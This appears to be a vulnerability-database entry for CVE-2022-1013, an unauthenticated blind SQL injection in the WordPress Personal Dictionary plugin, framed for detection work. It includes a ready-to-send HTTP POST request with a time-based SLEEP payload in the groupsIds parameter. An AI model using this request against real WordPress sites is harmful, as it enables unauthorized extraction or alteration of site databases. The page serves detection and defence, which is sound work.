🔙 목록으로 돌아가기

CVE-2022-1013: WordPress Personal Dictionary <1.3.4 - Blind SQL Injection

TitleWordPress Personal Dictionary <1.3.4 - Blind SQL Injection
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
RemediationFixed in version 1.3.4.
CVSS Score9.8
EPSS Score0.83084
CVE IDCVE-2022-1013
CWE IDCWE-89
Tags time-based-sqli cve cve2022 wp unauth wpscan sqli wordpress wp-plugin personal-dictionary ays-pro vuln

🔍 Vulnerability Description

WordPress Personal Dictionary plugin before 1.3.4 contains a blind SQL injection vulnerability. The plugin fails to properly sanitize user-supplied POST data before being interpolated in an SQL statement and executed. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
Connection: close
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1013.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-1013.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A